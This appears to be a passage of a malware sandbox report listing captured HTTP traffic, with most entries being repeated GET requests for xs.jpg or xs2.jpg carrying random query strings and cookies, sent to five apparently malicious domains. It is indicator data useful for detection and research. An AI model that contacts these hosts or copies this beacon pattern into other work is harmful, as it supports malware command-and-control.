        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?4745dc7=523145329 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159361|1720159259|3|27|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?c7a449b=1256037282 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159362|1720159259|3|27|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?10878fe9=831958971 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159363|1720159260|4|27|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?17066025=-432029326 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1ebf202e=-684072638 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2e78457f=1559268094 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159366|1720159259|4|28|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?356cb59d=1979250507 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159366|1720159259|3|28|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3b3f41b1=-1631925289 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159367|1720159260|4|28|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?3fc1b58c=-1102317868 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?a0c60b5a=1203532164 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?993d7f2c=-30180388 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159370|1720159259|4|29|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?d9ba63d9=-642096167 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159371|1720159259|4|29|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?8f00ee41=-1777774966 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159372|1720159260|4|29|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?696b574e=1010959850 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?cd510956=43331246 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?91f5dba5=-1243507985 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159375|1720159259|4|30|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?96090d15=739383850 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159375|1720159259|4|30|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?15c817e8=365434856 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159376|1720159260|4|30|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?334f6b3c=870089576 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1da045db=-1809752761 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?41ed49d4=-976757380 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159380|1720159259|4|31|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?826f9a23=-2106615261 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159380|1720159259|4|31|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2ec75429=1983553864 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159381|1720159260|4|31|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?2d6766a9=1799042376 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?43b77b4=71006132 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3385c362=1755862958 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159384|1720159259|4|32|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1bbff591=1396695219 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159385|1720159259|4|32|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?7d9f9d7d=2027870327 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159385|1720159260|4|32|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?ff31f566=-54012520 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?b51d7645=-1986834599 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?a08af9ff=72863736 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159389|1720159259|4|33|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?5a3b4a05=2006910499 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159389|1720159259|4|33|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?86fb760c=-1561768388 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159390|1720159260|4|33|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?6307741b=-972101578 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?38373338=-101659400 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?52638f9=777519297 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159393|1720159259|4|34|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?cdc80b22=164654932 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159394|1720159259|4|34|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?146c7f21=685309506 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159394|1720159260|4|34|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a01325a2=1076251460 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?13966ddd=657251258 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?140bbffd=1681571825 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159397|1720159259|4|35|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?ec575cc=1239108860 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159398|1720159259|4|35|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?e3527f49=-1924530908 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159398|1720159260|4|35|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1b715571=-151256839 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?c74bfbd0=-951321648 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?eb7bcec3=-1032623031 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159401|1720159259|4|36|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?ca9a0e20=1607346784 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159402|1720159259|4|36|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?608cb344=1129067416 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159402|1720159260|4|36|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?bd60bc68=2059499728 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?7f13e7e5=-154726670 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?20062123=-1608604241 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159407|1720159259|5|37|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?cd024f52=-1710973276 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159407|1720159259|4|37|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?81924fcd=-1962922341 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159408|1720159260|5|37|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?5b13db53=-1899589314 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?669212f9=-838957873 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?da20f51d=-2058775774 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159411|1720159259|4|38|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?eb94bb2e=-342574290 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159411|1720159259|4|38|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?70445cbe=-228113746 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159412|1720159260|4|38|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?972d623=951125202 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?d82b8544=1622021392 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?b09f39d0=-732261200 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159415|1720159259|4|39|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?dbb6fc30=-1826294640 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159416|1720159259|4|39|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?58f235fe=2037783532 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159416|1720159260|4|39|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?ea782f73=-1083666855 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?f026a792=-265902190 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?d74bda62=-1365789500 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159419|1720159259|4|40|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?3f66d776=-1144003526 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159420|1720159259|4|40|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?ae7223c4=-1178038512 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159420|1720159260|4|40|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?c74c2087=-923187898 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?c94ba6e9=1541600443 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9036add6=1088075608 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159423|1720159259|4|41|0
